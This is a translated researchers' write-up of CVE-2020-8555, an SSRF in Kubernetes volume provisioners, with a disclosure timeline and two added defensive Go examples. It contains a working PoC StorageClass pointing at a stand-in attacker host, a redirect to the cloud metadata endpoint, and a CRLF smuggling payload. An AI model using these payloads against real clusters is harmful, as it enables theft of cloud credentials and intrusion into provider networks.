When it's not only about a Kubernetes vulnerability...

Translator's note: the authors of this article describe in detail how they discovered the vulnerability CVE-2020-8555 in Kubernetes. Although at first it did not look very dangerous, in combination with other factors its criticality turned out to be maximal for some cloud providers. Several organisations rewarded the experts for their work.


Who we are

We are two French security researchers who jointly discovered a vulnerability in Kubernetes. Our names are Brice Augras and Christophe Hauquiert, but on many Bug Bounty platforms we are known as Reeverzax and Hach respectively:

What happened?

This article is our way of sharing how an ordinary research project unexpectedly turned into the most exciting adventure in the lives of two bug hunters (at least for now).

As you know, bug hunters have a couple of notable traits:

  • they live on pizza and beer;
  • they work when everyone else is asleep.

We are no exception to these rules: we usually meet on weekends and spend sleepless nights hacking. But one of those nights ended in a very unusual way.

Initially we met to discuss our participation in a CTF the following day. During a conversation about Kubernetes security in a managed-service environment, we recalled the old idea of SSRF (Server-Side Request Forgery) and decided to try using it as an attack scenario.

At 11 pm we sat down to do our research and went to bed early in the morning, very pleased with the results. It was this research that led us to the MSRC Bug Bounty program and to a privilege escalation exploit.

Several weeks and months passed, and our unexpected results led to one of the highest rewards in the history of the Azure Cloud Bug Bounty, in addition to the one we received from Kubernetes!

Based on our research project, the Kubernetes Product Security Committee published CVE-2020-8555.

Now I would like to spread information about the discovered vulnerability as widely as possible. We hope you appreciate the find and share the technical details with other members of the infosec community!

So here is our story...

Context

To make the most sense of what happened, let's first look at how Kubernetes works in a cloud-managed environment.

When you instantiate a Kubernetes cluster in such an environment, the control plane is typically the responsibility of the cloud provider:

The control plane is located on the cloud provider's perimeter, while the Kubernetes nodes are located on the customer's perimeter.

To allocate volumes dynamically, a mechanism is used that provisions them on demand from an external storage backend and matches them with a PVC (persistent volume claim, i.e. a request for a volume).

Thus, after a PVC is created and bound to a StorageClass in the K8s cluster, further actions to provision the volume are taken by the kube/cloud controller manager (its exact name depends on the release). (Translator's note: we have already written in more detail about the CCM, using the example of its implementation for one of the cloud providers, here.)

There are several types of provisioners supported by Kubernetes: most of them are included in the orchestrator core, while others are handled by additional provisioners that run in pods in the cluster.

In our research, we focused on the internal volume provisioning mechanism, shown below:

Dynamic provisioning of volumes using the built-in Kubernetes provisioner

In short, when Kubernetes is deployed in a managed environment, the controller manager is the responsibility of the cloud provider, but the volume creation request (number 3 in the diagram above) leaves the cloud provider's internal network. And that is where things get really interesting!

Hacking Scenario

In this section, we explain how we took advantage of the workflow mentioned above and gained access to the internal resources of the cloud service provider. It shows how certain actions become possible, such as obtaining internal credentials or escalating privileges.

One simple manipulation (in this case, Server-Side Request Forgery) made it possible to go beyond the customer environment into the clusters of various service providers offering managed K8s.

In our research we focused on the GlusterFS provisioner. Although the sequence of actions below is described in this context, Quobyte, StorageOS and ScaleIO are subject to the same vulnerability.

Abuse of the dynamic volume provisioning mechanism

While analysing the GlusterFS storage class in the Golang client source code, we noticed that in the first HTTP request (3) sent during volume creation, /volumes is appended to the end of the custom URL given in the resturl parameter.

We decided to get rid of this extra path by adding # to the resturl parameter. Here is the first YAML configuration we used to test for a semi-blind SSRF vulnerability (you can read more about semi-blind or blind SSRF, for example, here; translator's note):

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
  - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf

Then we used the kubectl binary to manage the Kubernetes cluster remotely. Typically, cloud providers (Azure, Google, AWS, etc.) allow you to obtain credentials for using this utility.

Thanks to this, I was able to use my "special" file. Kube-controller-manager executed the resulting HTTP request:

kubectl create -f sc-poc.yaml

Response from the attacker's perspective

Shortly after that, we were also able to get the HTTP response from the target server via the describe pvc or get events commands in kubectl. And indeed: this default Kubernetes driver is too verbose in its warnings and error messages...

Here is an example with a link to https://www.google.fr set as the resturl parameter:

kubectl describe pvc poc-ssrf
# or you can use kubectl get events


With this approach, we were limited to HTTP POST requests and could not get the response body content if the return code was 201. Therefore, we decided to do additional research and extended this hacking scenario with new approaches.

The evolution of our research

  • Advanced Scenario #1: Using a 302 redirect from an external server to change the HTTP method, giving a more flexible way of collecting internal data.
  • Advanced Scenario #2: Automating LAN scanning and internal resource discovery.
  • Advanced Scenario #3: Using HTTP CRLF injection + smuggling ("request smuggling") to craft custom HTTP requests and retrieve the data extracted from kube-controller logs.

Technical details

  • The research used Azure Kubernetes Service (AKS) with Kubernetes version 1.12 in the North Europe region.
  • The scenarios described above were run on the latest Kubernetes release, except for the third, which required Kubernetes built with Golang version ≤ 1.12.
  • The attacker's external server: https://attacker.com.

Advanced Scenario #1: Redirecting an HTTP POST request to GET and obtaining sensitive data

The original method was improved by configuring the attacker's server to return an HTTP 302 status code, converting the POST request into a GET request (step 4 in the diagram):


The first request (3) coming from the GlusterFS client (Controller Manager) is of type POST. By following these steps we were able to turn it into a GET:

  • http://attacker.com/redirect.php is specified as the resturl parameter in the StorageClass.
  • The endpoint https://attacker.com/redirect.php responds with an HTTP 302 status code and the following Location header: http://169.254.169.254. This could be any other internal resource; in this example, the redirect target is used only as an illustration.
  • By default the Golang net/http library follows the redirect and, on a 302 status code, converts the POST into a GET, resulting in an HTTP GET request to the target resource.

To read the HTTP response body, you need to describe the PVC object:

kubectl describe pvc xxx

Here is an example of an HTTP response in JSON format that we were able to obtain:


At that point, the possibilities of the discovered vulnerability were limited by the following points:

  • Inability to inject HTTP headers into the outgoing request.
  • Inability to perform a POST request with parameters in the body (this would be convenient for requesting a key value from an etcd instance running on port 2379 if unencrypted HTTP is used).
  • Inability to retrieve the response body content when the status code was 200 and the response did not have a JSON Content-Type.
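As an added example (not code from the article or from Kubernetes), the following Go program reproduces the net/http behaviour this scenario relies on against a local stand-in server, and shows the client setting that prevents it. The paths /redirect.php and /internal and the JSON body are constructed for this example.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// newStandIn starts a local server that plays both roles of the scenario
// (constructed for this example): /redirect.php answers 302 like the
// attacker's redirector; /internal reports the method it received on seen.
func newStandIn(seen chan<- string) *httptest.Server {
	mux := http.NewServeMux()
	mux.HandleFunc("/redirect.php", func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, "/internal", http.StatusFound) // 302 Found
	})
	mux.HandleFunc("/internal", func(w http.ResponseWriter, r *http.Request) {
		seen <- r.Method
		w.Header().Set("Content-Type", "application/json")
		fmt.Fprint(w, `{"leaked":"internal data"}`)
	})
	return httptest.NewServer(mux)
}

// ProbeRedirect sends a POST (like the provisioner's volume-create call) through
// client and returns the method that arrived at /internal ("" if the redirect
// was not followed) together with the final status code the client saw.
func ProbeRedirect(client *http.Client) (string, int, error) {
	seen := make(chan string, 1)
	srv := newStandIn(seen)
	defer srv.Close()
	resp, err := client.Post(srv.URL+"/redirect.php", "application/json", nil)
	if err != nil {
		return "", 0, err
	}
	resp.Body.Close()
	method := ""
	if len(seen) > 0 {
		method = <-seen
	}
	return method, resp.StatusCode, nil
}

// PinnedClient is the mitigated client: a 302 is handed back unfollowed, so a
// redirector cannot steer the request onto another host. A plain http.Client{}
// shows the default: the 302 is followed and the POST becomes a GET.
func PinnedClient() *http.Client {
	return &http.Client{CheckRedirect: func(*http.Request, []*http.Request) error {
		return http.ErrUseLastResponse
	}}
}

func main() {
	m, st, _ := ProbeRedirect(&http.Client{})
	fmt.Printf("default client: method at target=%q status=%d\n", m, st)
	m, st, _ = ProbeRedirect(PinnedClient())
	fmt.Printf("pinned client:  method at target=%q status=%d\n", m, st)
}
```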

Advanced Scenario #2: Scanning the local network

This semi-blind SSRF method was then used to scan the cloud provider's internal network and poll the various listening services (metadata instance, Kubelet, etc.) based on the kube controller's responses.


First, the standard listening ports of the Kubernetes components were determined (8443, 10250, 10251, etc.), and then we had to automate the scanning process.

Seeing that this method of scanning resources is very specific and incompatible with classic scanners and SSRF tools, we decided to write our own workers in a bash script that automates the whole process.

For example, to quickly scan the 172.16.0.0/12 range of the internal network, 15 workers were launched in parallel. The IP range above was chosen only as an example and may be changed to the IP range of your particular service provider.

To scan one IP address and one port, you need to do the following:

  • delete the last checked StorageClass;
  • delete the previously checked Persistent Volume Claim;
  • change the IP and port values in sc.yaml;
  • create a StorageClass with the new IP and port;
  • create a new PVC;
  • extract the scan results using describe on the PVC.

Advanced Scenario #3: CRLF injection + HTTP smuggling in "old" versions of the Kubernetes cluster

If, in addition, the provider offered customers old versions of the K8s cluster and gave them access to the kube-controller-manager logs, the effect became even more significant.

It is much more convenient for an attacker to modify the HTTP requests so that the full HTTP response is obtained at their discretion.


To carry out the last scenario, the following conditions had to be met:

  • The user must have access to the kube-controller-manager logs (as, for example, in Azure LogInsights).
  • The Kubernetes cluster must use a Golang version lower than 1.12.

We deployed a local environment simulating the communication between the GlusterFS Go client and a fake target server (we will refrain from publishing the PoC for now).

A vulnerability was found that affects Golang versions below 1.12 and allows attackers to perform HTTP smuggling/CRLF attacks.

By combining the semi-blind SSRF described above with this, we were able to send requests of our choosing, including replacing the headers, the HTTP method, the parameters and the data, which kube-controller-manager then processed.

Here is an example of a working "bait" for the resturl parameter of the StorageClass that uses this attack scenario:

http://172.31.X.1:10255/healthz? HTTP/1.1\r\nConnection: keep-alive\r\nHost: 172.31.X.1:10255\r\nContent-Length: 1\r\n\r\n1\r\nGET /pods? HTTP/1.1\r\nHost: 172.31.X.1:10255\r\n\r\n

The result is an "unsolicited response" error, a message about which is recorded in the controller logs. Thanks to the verbosity enabled by default, the contents of the HTTP response message are also stored there.
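As an added example (not code from the article or from Kubernetes), the following Go check is the kind of admission-time validation of the resturl parameter that would refuse both the "#" trick of the first PoC and the CRLF bait above. The four provisioner names are the in-tree ones for the drivers the article lists; the allowlisted backend hostname is an assumption.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
	"strings"
)

// In-tree provisioners the article names; kube-controller-manager sends an
// HTTP request to their resturl parameter during volume provisioning.
var affectedProvisioners = map[string]bool{
	"kubernetes.io/glusterfs": true,
	"kubernetes.io/quobyte":   true,
	"kubernetes.io/storageos": true,
	"kubernetes.io/scaleio":   true,
}

// ValidateRestURL is an admission-style check for a StorageClass resturl.
// It rejects whitespace and CR/LF (the smuggling payload), "#" (the fragment
// trick), non-HTTPS schemes, embedded credentials, IP literals (how
// 169.254.169.254 or a control-plane address would be reached) and any host
// outside the allowlist of approved storage backends. nil means acceptable.
func ValidateRestURL(provisioner, raw string, allowedHosts []string) error {
	if !affectedProvisioners[provisioner] {
		return nil // other provisioners do not forward resturl
	}
	if strings.ContainsAny(raw, " \t\r\n#") {
		return errors.New("resturl contains whitespace, control characters or '#'")
	}
	u, err := url.Parse(raw)
	if err != nil {
		return fmt.Errorf("resturl does not parse: %w", err)
	}
	if u.Scheme != "https" || u.User != nil {
		return errors.New("resturl must be https without embedded credentials")
	}
	host := u.Hostname()
	if net.ParseIP(host) != nil {
		return fmt.Errorf("resturl must name the backend by hostname, not %s", host)
	}
	for _, h := range allowedHosts {
		if strings.EqualFold(h, host) {
			return nil
		}
	}
	return fmt.Errorf("host %q is not an approved storage backend", host)
}

func main() {
	allowed := []string{"heketi.storage.example.internal"} // assumed backend name
	fmt.Println(ValidateRestURL("kubernetes.io/glusterfs", "http://attacker.com:6666/#", allowed))
}
```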


This was the "juiciest" working exploit in our proof-of-concept framework.

Using this method, we were able to carry out the following attacks on clusters of various managed k8s providers: privilege escalation with credentials from metadata instances, master DoS via (unencrypted) HTTP requests to etcd master instances, etc.

Results

In the official Kubernetes statement on the SSRF vulnerability we found, it was given a CVSS rating of 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. If we consider only the vulnerability within the Kubernetes perimeter, the integrity vector qualifies as None.

However, assessing the possible consequences in the context of a managed-service environment (and this was the most interesting part of our research!) prompted us to reclassify the vulnerability as critical, with a CVSS rating of 10/10, for many providers.

Below is additional information to help you understand our considerations when assessing the possible impact in cloud environments:

Integrity

  • Execute commands remotely using the obtained internal credentials.
  • Reproduce the above scenario using the IDOR (Insecure Direct Object Reference) method with other resources found on the local network.

Confidentiality

  • Lateral movement thanks to theft of cloud credentials (for example, from the metadata API).
  • Collect information by scanning the local network (determining the SSH version, HTTP server version, ...).
  • Collect instance and infrastructure information by polling internal APIs such as the metadata API (http://169.254.169.254, ...).
  • Theft of customer data using cloud credentials.

Availability

  • All exploitation scenarios related to the integrity attack vectors can be used for destructive actions and lead to master instances being unavailable from the customer perimeter (or any other).

Since we were in a managed K8s environment and assessing the impact on integrity, we can imagine many scenarios that could affect availability. Additional examples include corrupting the etcd database or making a critical call to the Kubernetes API.

Timeline

  • December 6, 2019: Vulnerability reported to MSRC Bug Bounty.
  • January 3, 2020: A third party informed the Kubernetes developers that we were working on a security issue and asked them to consider the SSRF as an internal (in-core) vulnerability. We then provided a general report with technical details about the source of the problem.
  • January 15, 2020: We provided technical and general reports to the Kubernetes developers at their request (via the HackerOne platform).
  • January 15, 2020: The Kubernetes developers informed us that the semi-blind SSRF + CRLF injection for previous releases is considered an in-core vulnerability. We immediately stopped analysing the perimeters of other service providers: the K8s team was now handling the root cause.
  • January 15, 2020: MSRC reward received via HackerOne.
  • January 16, 2020: The Kubernetes PSC (Product Security Committee) acknowledged the vulnerability and asked to keep it confidential until mid-March due to the large number of potential victims.
  • February 11, 2020: Google VRP reward received.
  • March 4, 2020: Kubernetes reward received via HackerOne.
  • March 15, 2020: The originally scheduled public disclosure was postponed due to the COVID-19 situation.
  • June 1, 2020: Joint Kubernetes + Microsoft statement about the vulnerability.

TL;DR

  • We drank beer and ate pizza :)
  • We discovered an in-core vulnerability in Kubernetes, although we had no intention of doing so.
  • We did additional analysis on the clusters of different cloud providers and were able to increase the damage caused by the vulnerability in order to obtain additional impressive bonuses.
  • You will find a lot of technical details in this article. We would be happy to discuss them with you (Twitter: @ReeverZax & @__hach_).
  • It turned out that all sorts of formalities and reporting took much longer than expected.


Source: www.habr.com
